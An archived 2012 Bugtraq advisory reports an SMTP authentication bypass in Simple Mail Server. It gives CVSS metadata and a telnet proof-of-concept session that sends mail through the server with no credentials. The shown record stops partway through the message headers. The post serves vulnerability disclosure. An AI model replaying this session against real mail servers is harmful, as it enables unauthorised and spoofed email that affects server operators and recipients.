[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Simple Mail Server - SMTP Authentication Bypass Vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Simple Mail Server - SMTP Authentication Bypass Vulnerability
- From: demonalex@xxxxxxx
- Date: Sun, 8 Jan 2012 15:10:00 GMT
Title: Simple Mail Server - SMTP Authentication Bypass Vulnerability
Software : Simple Mail Server
Software Version : 2011-12-30
Vendor: http://simplemailsvr.sourceforge.net/
Class: Origin Validation Error
CVE:
Remote: Yes
Local: No
Published: 2012-01-08
Updated:
CVSS2 Base: 6.4 (AV:N/AC:L/Au:N/C:P/I:N/A:P)
Impact : Medium (4 < 6.4 < 8)
Bug Description :
Simple Mail Server is a tiny Mail Server written in C#. It can be sent mail
without password by using usual tcp client(such as telnet).
And it did not have SMTP authentication contoller.
POC(Remarks: domain alex.com and user alex@xxxxxxxx must be exists in
configuration for this test case):
>telnet 127.0.0.1 25
220 TEST-121F797342 SMTP ready.
EHLO mail_of_alert
500 Not supported. Use HELO
MAIL FROM: <alex@xxxxxxxx>
250 OK
RCPT TO: <alex@xxxxxxxx>
250 OK
Data
354 Start mail input; end with <CRLF>.<CRLF>
From: "alex@xxxxxxxx" <alex@xxxxxxxx>
To: "alex@xxxxxxxx" <alex@xxxxxxxx>
Subject: authenticate is not required!